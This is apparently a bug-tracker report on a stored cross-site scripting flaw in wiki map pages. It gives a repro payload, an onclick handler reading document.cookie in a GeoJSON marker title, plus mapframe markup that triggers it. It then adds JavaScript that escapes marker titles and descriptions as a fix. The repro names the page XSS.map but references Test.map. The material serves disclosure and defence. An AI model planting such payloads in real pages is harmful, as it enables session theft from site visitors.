Discovered while investigating {T155216}. Minimal repro:
On the shared wiki, create a page called `Data:XSS.map`:
```lang=javascript
{
    "license": "CC0-1.0",
    "description": {
        "en": "blah"
    },
    "sources": "blah",
    "zoom": 13,
    "latitude": -34.75315,
    "longitude": 149.71575,
    "data": {
        "type": "FeatureCollection",
        "features": [
            {
                "type": "Feature",
                "properties": {
                    "title": {
                        "en": "<span onclick='javascript:alert(document.cookie)'>Click me</span>"
                    }
                },
                "geometry": {
                    "type": "Point",
                    "coordinates": [
                        149.713056,
                        -34.7475
                    ]
                }
            }
        ]
    }
}
```
Then, on either the same wiki or a client wiki, create the following page:
```
<mapframe width=500 height=500>
{
"type": "ExternalData",
"service": "page",
"title": "Test.map"
}
</mapframe>
```
Upon saving and clicking on the affected marker, then on "click me", XSS is triggered. Doesn't seem to work with crude `<script>` injection.
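One way to neutralise the marker title from the repro before it reaches a popup, as an added example that is not part of the original report and not the extension's own code. It assumes popup text is meant to be plain text, and it also covers a feature `description` property, which the report does not mention; the function names are hypothetical.

```javascript
// Added example, not the extension's code. Assumption: popup titles and
// descriptions are plain text, so every HTML metacharacter is escaped.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// A title/description is either a string or a { lang: string } map.
// Anything else (numbers, arrays, nested objects) is replaced by ''.
function escapeLocalized(value) {
  if (typeof value === 'string') return escapeHtml(value);
  if (value && typeof value === 'object' && !Array.isArray(value)) {
    const out = {};
    for (const [lang, text] of Object.entries(value)) {
      out[lang] = typeof text === 'string' ? escapeHtml(text) : '';
    }
    return out;
  }
  return '';
}

// Returns a sanitized copy of a GeoJSON object; the input is not modified.
function sanitizeGeoJson(node) {
  if (Array.isArray(node)) return node.map(sanitizeGeoJson);
  if (!node || typeof node !== 'object') return node;
  const copy = { ...node };
  if (node.type === 'FeatureCollection' && Array.isArray(node.features)) {
    copy.features = node.features.map(sanitizeGeoJson);
  } else if (node.type === 'Feature' && node.properties && typeof node.properties === 'object') {
    copy.properties = { ...node.properties };
    for (const key of ['title', 'description']) {
      if (key in copy.properties) copy.properties[key] = escapeLocalized(copy.properties[key]);
    }
  }
  return copy;
}

// Constructed sample mirroring the "data" member of the map page above.
const sample = {
  type: 'FeatureCollection',
  features: [{
    type: 'Feature',
    properties: { title: { en: "<span onclick='javascript:alert(document.cookie)'>Click me</span>" } },
    geometry: { type: 'Point', coordinates: [149.713056, -34.7475] }
  }]
};
const cleaned = sanitizeGeoJson(sample);
console.log(cleaned.features[0].properties.title.en);
```

The escaped string has to be the only form that the popup renderer ever receives; escaping at save time alone does not cover data fetched from another wiki.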